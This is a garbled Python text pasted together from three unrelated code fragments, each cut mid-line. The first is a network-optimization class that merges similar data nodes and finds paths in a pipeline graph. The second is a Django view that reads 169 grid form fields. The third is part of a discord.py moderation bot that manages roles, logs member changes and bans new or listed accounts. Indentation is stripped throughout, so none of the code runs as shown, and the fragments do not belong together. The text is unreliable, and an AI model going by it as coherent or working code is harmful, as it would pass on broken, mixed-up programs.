# Node1 Node2
# preprocess="unknown" preprocess=<everything else>
#
# If this happens, merge them to simplify the network.
def __init__(self):
pass
def optimize(self, network, custom_attributes):
import copy
network = copy.deepcopy(network)
while True:
similar = self._find_similar_nodes(network, custom_attributes)
if not similar:
break
# Merge the similar nodes.
while similar:
n1, n2 = similar.pop()
network = self._merge_nodes(network, n1, n2)
similar = _fix_node_id_pairs_after_merge(similar, n1, n2)
return network
def _find_similar_nodes(self, network, custom_attributes):
# Return a list of (node_id1, node_id2). Can be empty.
nodeid2parents = _make_parents_dict(network)
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
# Optimization: The same calls are made to _fc_to_output_ids,
# which takes up a lot of the compute time. Cache these
# calls.
fc_cache = {}
similar = []
for i, node_id1 in enumerate(data_node_ids):
for node_id2 in data_node_ids[i+1:]:
if self._are_nodes_similar(
network, node_id1, node_id2, custom_attributes,
nodeid2parents, fc_cache):
similar.append((node_id1, node_id2))
return similar
def _are_nodes_similar(
self, network, node_id1, node_id2, custom_attributes,
nodeid2parents, fc_cache):
node_1 = network.nodes[node_id1]
node_2 = network.nodes[node_id2]
# The data type must be the same.
if node_1.datatype.name != node_2.datatype.name:
return False
# They must share the same children.
c1 = network.transitions.get(node_id1, [])
c2 = network.transitions.get(node_id2, [])
if len(c1) != len(c2):
return False
if sorted(c1) != sorted(c2):
return False
# They might not share the same parents.
# align_bowtie1 -> SamFolder.aligner (bowtie1)
# align_bowtie2 -> SamFolder.aligner (bowtie2)
# Merge to:
# align_bowtie1 -> SamFolder.aligner (bowtie1, bowtie2)
# align_bowtie2 ->
## They must share the same parents.
##p1 = nodeid2parents.get(node_id1, [])
##p2 = nodeid2parents.get(node_id2, [])
##if len(p1) != len(p2):
## return False
##if sorted(p1) != sorted(p2):
## return False
# They must share all but 1 attribute.
x, x, diff_attrs = _score_same_data(node_1, node_2)
if len(diff_attrs) != 1:
return False
# After merging, these data nodes must be able to generate all
# the (grand)children that the unmerged data could generate.
module_ids = c1
paths = [] # list of (in_data_ids, module_id, out_data_id)
for module_id in module_ids:
if module_id not in fc_cache:
x = _fc_to_output_ids(
network, module_id, custom_attributes,
nodeid2parents=nodeid2parents)
fc_cache[module_id] = x
paths.extend(fc_cache[module_id])
# Make sure the input data includes node_id1 or node_id2.
paths = [x for x in paths if node_id1 in x[0] or node_id2 in x[0]]
# Make sure the input data does include both node_id1 and node_id2.
paths = [x for x in paths
if not (node_id1 in x[0] and node_id2 in x[0])]
# The combined data node must be able to generate all these
# out data nodes.
merged_data = _merge_data_nodes(node_1, node_2)
for x in paths:
in_data_ids, module_id, out_data_id = x
in_datas = [network.nodes[x] for x in in_data_ids]
for i in range(len(in_data_ids)):
if in_data_ids[i] in [node_id1, node_id2]:
in_datas[i] = merged_data
break
module = network.nodes[module_id]
out_data = network.nodes[out_data_id]
if not _is_valid_inputs(
module, in_datas, out_data, custom_attributes):
return False
return True
def _merge_nodes(self, network, node_id1, node_id2):
# Delete the one with the higher node_id (node_id2).
if node_id1 > node_id2:
node_id1, node_id2 = node_id2, node_id1
# Merge the attributes of the nodes.
n1 = network.nodes[node_id1]
n2 = network.nodes[node_id2]
network.nodes[node_id1] = _merge_data_nodes(n1, n2)
# Everything that pointed to node_id2 now goes to node_id1.
for node_id, next_ids in network.transitions.iteritems():
if node_id2 in next_ids and node_id1 not in next_ids:
next_ids.append(node_id1)
# They share the same children already. No need to add.
return network.delete_node(node_id2)
class _OptimizeMergeData2:
# is_compressed -> Fastq.trimmed=no -> uncompress
# is_compressed -> Fastq.trimmed=yes -> uncompress
# Sometimes will be root nodes (no parents).
#
# Actually, don't use this. It can make the inferencing harder.
# e.g.
# Fastq.trimmed (no, yes) -> is_compressed -> Fastq.trimmed (no)
# Hard to reason whether Fastq.trimmed (no, yes) is a valid
# antecedent of Fastq.trimmed (no).
def __init__(self):
pass
def optimize(self, network, custom_attributes):
import copy
network = copy.deepcopy(network)
while True:
similar = self._find_similar_nodes(network)
if not similar:
break
# Merge the similar nodes.
while similar:
n1, n2 = similar.pop()
network = self._merge_nodes(network, n1, n2)
similar = _fix_node_id_pairs_after_merge(similar, n1, n2)
return network
def _find_similar_nodes(self, network):
# Return a list of (node_id1, node_id2). Can be empty.
nodeid2parents = _make_parents_dict(network)
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
similar = []
for i, node_id1 in enumerate(data_node_ids):
for node_id2 in data_node_ids[i+1:]:
if self._are_nodes_similar(
network, node_id1, node_id2, nodeid2parents):
similar.append((node_id1, node_id2))
return similar
def _are_nodes_similar(self, network, node_id1, node_id2,
nodeid2parents):
node_1 = network.nodes[node_id1]
node_2 = network.nodes[node_id2]
# The data type must be the same.
if node_1.datatype.name != node_2.datatype.name:
return False
# They must share the same children.
c1 = network.transitions.get(node_id1, [])
c2 = network.transitions.get(node_id2, [])
if len(c1) != len(c2):
return False
if sorted(c1) != sorted(c2):
return False
# They must share the same parents.
p1 = nodeid2parents.get(node_id1, [])
p2 = nodeid2parents.get(node_id2, [])
if len(p1) != len(p2):
return False
if sorted(p1) != sorted(p2):
return False
# They must share all but 1 attribute.
x, x, diff_attrs = _score_same_data(node_1, node_2)
if len(diff_attrs) != 1:
return False
return True
def _merge_nodes(self, network, node_id1, node_id2):
# Delete the one with the higher node_id (node_id2).
if node_id1 > node_id2:
node_id1, node_id2 = node_id2, node_id1
# Merge the attributes of the nodes.
n1 = network.nodes[node_id1]
n2 = network.nodes[node_id2]
network.nodes[node_id1] = _merge_data_nodes(n1, n2)
# They share the same parents and children, so nothing needs
# to be rewired.
return network.delete_node(node_id2)
def _find_paths_h(network, node_id, custom_attributes, nodeid2parents):
#import itertools
assert node_id < len(network.nodes)
node = network.nodes[node_id]
prev_ids = nodeid2parents.get(node_id)
if not prev_ids:
assert isinstance(node, DataNode)
yield (node_id,)
return
if isinstance(node, DataNode):
combos = []
for prev_id in prev_ids:
combos.append((prev_id,))
elif isinstance(node, ModuleNode):
combos = _bc_to_input_ids(
network, node_id, custom_attributes, nodeid2parents=nodeid2parents)
for combo in combos:
# Make a list of the possible paths for each branch.
branch2paths = []
for prev_id in combo: # prev_id is node_id for one branch
paths = []
for x in _find_paths_h(
network, prev_id, custom_attributes, nodeid2parents):
x = tuple(x)
paths.append(x)
assert paths
branch2paths.append(paths)
# Merge the paths for each branch.
for x in _product_and_chain(branch2paths, None):
x = x + (node_id,)
yield x
def find_paths(network, custom_attributes, max_paths=None):
# Iterate over all possible paths from the start nodes to the end
# nodes. Each path is a list of the node_ids.
assert network.nodes, "empty network"
nodeid2parents = _make_parents_dict(network)
for i, x in enumerate(
_find_paths_h(network, 0, custom_attributes, nodeid2parents)):
yield x
if max_paths is not None and i >= max_paths:
break
def _find_paths_by_datatypes_h(
network, node_id, custom_attributes, datatype_names,
nodeid2parents, depth):
# Yield tuples of:
# path list of node_ids in this path.
# used_ids list of node_ids for nodes from datatype_names
# missing_ids list of node_ids not in datatype_names
import itertools
assert node_id < len(network.nodes), "%s %d" % (
repr(node_id), len(network.nodes))
node = network.nodes[node_id]
prev_ids = _get_parents_of(network, node_id)
if isinstance(node, DataNode):
# If this node is one of these datatypes, then this can be an input.
if node.datatype.name in datatype_names:
yield [node_id], [node_id], []
elif not prev_ids:
# If this is a start node, then this is a missing input.
yield [node_id], [], [node_id]
combos = []
for prev_id | |
' ').replace('\n', ' ').replace('\r', ' ')
r1c8 = request.POST.get('r1c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c9 = request.POST.get('r1c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c10 = request.POST.get('r1c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c11 = request.POST.get('r1c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c12 = request.POST.get('r1c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c13 = request.POST.get('r1c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c1 = request.POST.get('r2c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c2 = request.POST.get('r2c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c3 = request.POST.get('r2c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c4 = request.POST.get('r2c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c5 = request.POST.get('r2c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c6 = request.POST.get('r2c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c7 = request.POST.get('r2c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c8 = request.POST.get('r2c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c9 = request.POST.get('r2c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c10 = request.POST.get('r2c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c11 = request.POST.get('r2c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c12 = request.POST.get('r2c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c13 = request.POST.get('r2c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c1 = request.POST.get('r3c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c2 = request.POST.get('r3c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c3 = request.POST.get('r3c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c4 = request.POST.get('r3c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c5 = request.POST.get('r3c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c6 = request.POST.get('r3c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c7 = request.POST.get('r3c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c8 = request.POST.get('r3c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c9 = request.POST.get('r3c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c10 = request.POST.get('r3c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c11 = request.POST.get('r3c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c12 = request.POST.get('r3c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c13 = request.POST.get('r3c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c1 = request.POST.get('r4c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c2 = request.POST.get('r4c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c3 = request.POST.get('r4c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c4 = request.POST.get('r4c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c5 = request.POST.get('r4c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c6 = request.POST.get('r4c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c7 = request.POST.get('r4c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c8 = request.POST.get('r4c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c9 = request.POST.get('r4c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c10 = request.POST.get('r4c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c11 = request.POST.get('r4c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c12 = request.POST.get('r4c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c13 = request.POST.get('r4c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c1 = request.POST.get('r5c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c2 = request.POST.get('r5c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c3 = request.POST.get('r5c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c4 = request.POST.get('r5c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c5 = request.POST.get('r5c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c6 = request.POST.get('r5c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c7 = request.POST.get('r5c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c8 = request.POST.get('r5c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c9 = request.POST.get('r5c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c10 = request.POST.get('r5c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c11 = request.POST.get('r5c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c12 = request.POST.get('r5c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c13 = request.POST.get('r5c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c1 = request.POST.get('r6c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c2 = request.POST.get('r6c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c3 = request.POST.get('r6c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c4 = request.POST.get('r6c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c5 = request.POST.get('r6c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c6 = request.POST.get('r6c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c7 = request.POST.get('r6c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c8 = request.POST.get('r6c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c9 = request.POST.get('r6c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c10 = request.POST.get('r6c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c11 = request.POST.get('r6c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c12 = request.POST.get('r6c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c13 = request.POST.get('r6c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c1 = request.POST.get('r7c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c2 = request.POST.get('r7c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c3 = request.POST.get('r7c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c4 = request.POST.get('r7c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c5 = request.POST.get('r7c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c6 = request.POST.get('r7c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c7 = request.POST.get('r7c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c8 = request.POST.get('r7c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c9 = request.POST.get('r7c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c10 = request.POST.get('r7c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c11 = request.POST.get('r7c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c12 = request.POST.get('r7c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c13 = request.POST.get('r7c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c1 = request.POST.get('r8c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c2 = request.POST.get('r8c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c3 = request.POST.get('r8c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c4 = request.POST.get('r8c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c5 = request.POST.get('r8c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c6 = request.POST.get('r8c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c7 = request.POST.get('r8c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c8 = request.POST.get('r8c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c9 = request.POST.get('r8c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c10 = request.POST.get('r8c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c11 = request.POST.get('r8c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c12 = request.POST.get('r8c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c13 = request.POST.get('r8c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c1 = request.POST.get('r9c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c2 = request.POST.get('r9c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c3 = request.POST.get('r9c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c4 = request.POST.get('r9c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c5 = request.POST.get('r9c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c6 = request.POST.get('r9c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c7 = request.POST.get('r9c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c8 = request.POST.get('r9c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c9 = request.POST.get('r9c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c10 = request.POST.get('r9c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c11 = request.POST.get('r9c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c12 = request.POST.get('r9c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c13 = request.POST.get('r9c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c1 = request.POST.get('r10c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c2 = request.POST.get('r10c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c3 = request.POST.get('r10c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c4 = request.POST.get('r10c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c5 = request.POST.get('r10c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c6 = request.POST.get('r10c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c7 = request.POST.get('r10c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c8 = request.POST.get('r10c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c9 = request.POST.get('r10c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c10 = request.POST.get('r10c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c11 = request.POST.get('r10c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c12 = request.POST.get('r10c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c13 = request.POST.get('r10c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c1 = request.POST.get('r11c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c2 = request.POST.get('r11c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c3 = request.POST.get('r11c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c4 = request.POST.get('r11c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c5 = request.POST.get('r11c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c6 = request.POST.get('r11c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c7 = request.POST.get('r11c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c8 = request.POST.get('r11c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c9 = request.POST.get('r11c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c10 = request.POST.get('r11c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c11 = request.POST.get('r11c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c12 = request.POST.get('r11c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c13 = request.POST.get('r11c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c1 = request.POST.get('r12c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c2 = request.POST.get('r12c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c3 = request.POST.get('r12c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c4 = request.POST.get('r12c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c5 = request.POST.get('r12c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c6 = request.POST.get('r12c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c7 = request.POST.get('r12c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c8 = request.POST.get('r12c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c9 = request.POST.get('r12c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c10 = request.POST.get('r12c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c11 = request.POST.get('r12c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c12 = request.POST.get('r12c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c13 = request.POST.get('r12c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c1 = request.POST.get('r13c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c2 = request.POST.get('r13c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c3 = request.POST.get('r13c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c4 = request.POST.get('r13c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c5 = request.POST.get('r13c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c6 = request.POST.get('r13c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c7 = request.POST.get('r13c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c8 = request.POST.get('r13c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c9 = request.POST.get('r13c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c10 = request.POST.get('r13c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c11 = request.POST.get('r13c11').replace('\t', | |
try:
os.remove(filePath + '.busy')
except:
pass
await bot.delete_message(message)
return
if message.content.lower().startswith('.iam'):
if message.content.lower().startswith('.iamz') and is_zig(message):
zigBot = discord.utils.get(message.server.roles, id = botRole)
if not zigBot in message.author.roles:
await bot.add_roles(message.author, zigBot)
await bot.delete_message(message)
else:
await bot.remove_roles(message.author, zigBot)
await bot.delete_message(message)
return
elif message.content.lower().startswith('.iamz'):
await bot.send_message(message.channel, message.author.mention + ' You\'re not Zig.')
return
if message.content.lower().startswith('.iam epic') and is_cheeti(message):
zigBot = discord.utils.get(message.server.roles, id = botRole)
if not zigBot in message.author.roles:
msg = await bot.send_message(message.channel,'You\'re epic!')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
await bot.delete_message(message)
else:
msg = await bot.send_message(message.channel,'You\'re epic!')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
await bot.delete_message(message)
return
elif message.content.lower().startswith('.iam epic'):
await bot.send_message(message.channel, message.author.mention + ' You\'re not epic.')
return
Snow1 = discord.utils.get(message.server.roles, id = talkRole)
Snow2 = discord.utils.get(message.server.roles, id = joinRole)
# Checks for single role or if user removed all roles
await asyncio.sleep(1)
if message.content.lower().startswith('.iamn') and discord.utils.get(message.author.roles, id = busyRole) is None:
await asyncio.sleep(1)
if not is_political(message):
# User removed role, revert
msg = await bot.send_message(message.channel, 'You aren\'t allowed to chat without an ideology. Please choose a role from #roles or `.lsar`')
await bot.add_roles(message.author, Snow2)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow1)
await asyncio.sleep(7)
await bot.delete_message(msg)
await bot.delete_message(message)
# Checks for initial role to remove undecided
elif discord.utils.get(message.author.roles, id = talkRole) is None and discord.utils.get(message.author.roles, id = joinRole) is not None and is_political(message):
await bot.add_roles(message.author, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow2)
# If role doesn't exist
elif not is_political(message):
if discord.utils.get(message.author.roles, id = busyRole) is None:
msg = await bot.send_message(message.channel, 'Please choose a political role from #roles or `.lsar`')
else:
msg = await bot.send_message(message.channel, 'Your status is still set to busy.\n Please `.iamn busy` to get your roles back.')
await asyncio.sleep(7)
await bot.delete_message(msg)
await bot.delete_message(message)
# Checks for meme roles to shitpost
message.content = message.content.lower()
for x in range(len(memeRoles)):
if message.content.startswith(memeRoles[x-1]) and not is_serious(message):
filePath = curDir + '/logs/db/' + message.author.id
shit = discord.utils.get(message.server.roles, id = shetRole)
Snow1 = discord.utils.get(message.server.roles, id = talkRole)
Snow2 = discord.utils.get(message.server.roles, id = joinRole)
channel = discord.Object(id=shetChan)
await bot.add_roles(message.author, shit)
await bot.send_message(message.channel, '**' + message.author.name + '** was shitposted pending manual approval.')
msg = await bot.send_message(channel, message.author.mention + ', this role is commonly used by memers and raiders. Please contact admin/mod to regain access.')
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow2)
await asyncio.sleep(120)
await bot.delete_message(msg)
p = open(filePath + '.punish', 'w+')
p.close()
############################
############################
# If no on_message command invoked, check bot commands
else:
# https://discordpy.readthedocs.io/en/latest/faq.html#why-does-on-message-make-my-commands-stop-working
await bot.process_commands(message)
############################
############################
@bot.event
async def on_member_update(before, after):
no = discord.Object(id=ignoreServ)
if before.server is no:
return
if str(before.nick) != str(after.nick):
embed=discord.Embed(description=before.mention + " **nickname changed**", color=0x117ea6)
embed.add_field(name="Before", value=before.nick, inline=False)
embed.add_field(name="After", value=after.nick, inline=False)
pfp = get_avatar(before)
embed.set_author(name=before, icon_url=pfp)
embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
elif before.roles is not after.roles:
if before.roles > after.roles:
# testout = [before.roles[x] for x in before.roles]
# embed=discord.Embed(description=before.mention + " **nickname changed**", color=0x117ea6)
# embed.add_field(name=before.mention + " **was given the" , value=before.nick, inline=False)
# pfp = get_avatar(before)
# embed.set_author(name=before, icon_url=pfp)
# embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
# await bot.send_message(discord.Object(id=adminLogs),embed=embed)
# await log_backup_embed(embed)
print('roles changed')
elif after.roles > before.roles:
print('less')
print('roles changed')
else:
pass
else:
return
@bot.event
async def on_member_join(member):
no = discord.Object(id=ignoreServ)
if member.server is no:
return
sendWelcome = True
Snow2 = discord.utils.get(member.server.roles, id = joinRole)
# Member join log
embed=discord.Embed(description=member.mention + " " + member.name, color=0x23d160)
embed.add_field(name="Account Creation Date", value=member.created_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Joined", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
# kicks new accounts to prevent raid
if datetime.utcnow() - timedelta(hours=newAccount) < member.created_at:
channel = discord.utils.get(member.server.channels, id = adminChan)
await bot.send_message(member, 'Your account is too new to for "Coffee & Politics". If you wish to join our discussions please wait a few days and try again. :D')
await bot.send_message(channel, '@here\nI kicked ' + member.mention + ' because account was made in the last ' + str(newAccount) + ' hours.')
await bot.ban(member,0)
sendWelcome = False
# Checks for punishment evasion
try:
filePath = curDir + '/logs/db/' + str(member.id)
# Looks for punish file
t = open(filePath + '.punish')
t.close()
jail = discord.utils.get(member.server.roles, id = jailRole)
Snow1 = discord.utils.get(member.server.roles, id = talkRole)
Snow2 = discord.utils.get(member.server.roles, id = joinRole)
try:
k = open(filePath + '.kicked')
k.close()
sendWelcome = True
except:
embed=discord.Embed(title="User Jailed!", description="**{0}** was jailed for punishment evasion!".format(member), color=0xd30000)
await bot.send_message(discord.Object(id=logAct),embed=embed)
sendWelcome = False
# await bot.say(embed=embed)
await bot.add_roles(member, jail)
await asyncio.sleep(1)
await bot.remove_roles(member, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(member, Snow2)
except:
pass
with open(curDir + '/include/special') as txt:
specialPeople = [line.strip('\n').split(',') for line in txt]
with open(curDir + '/include/whitelist') as txt:
whitelist = [line.strip('\n').split(',') for line in txt]
if [str(member.id)] in specialPeople and not [str(member.id)] in whitelist:
channel = discord.utils.get(member.server.channels, id = adminChan)
await bot.send_message(channel, '@here\nI banned ' + member.mention + ' for stuff and things and reasons.')
await bot.ban(member,0)
sendWelcome = False
# Looks for time file
try:
t = open(curDir + '/logs/db/' + mainServ + '.time')
t.close()
if sendWelcome:
await bot.add_roles(member, Snow2)
channel = discord.utils.get(member.server.channels, id = welcomeChan)
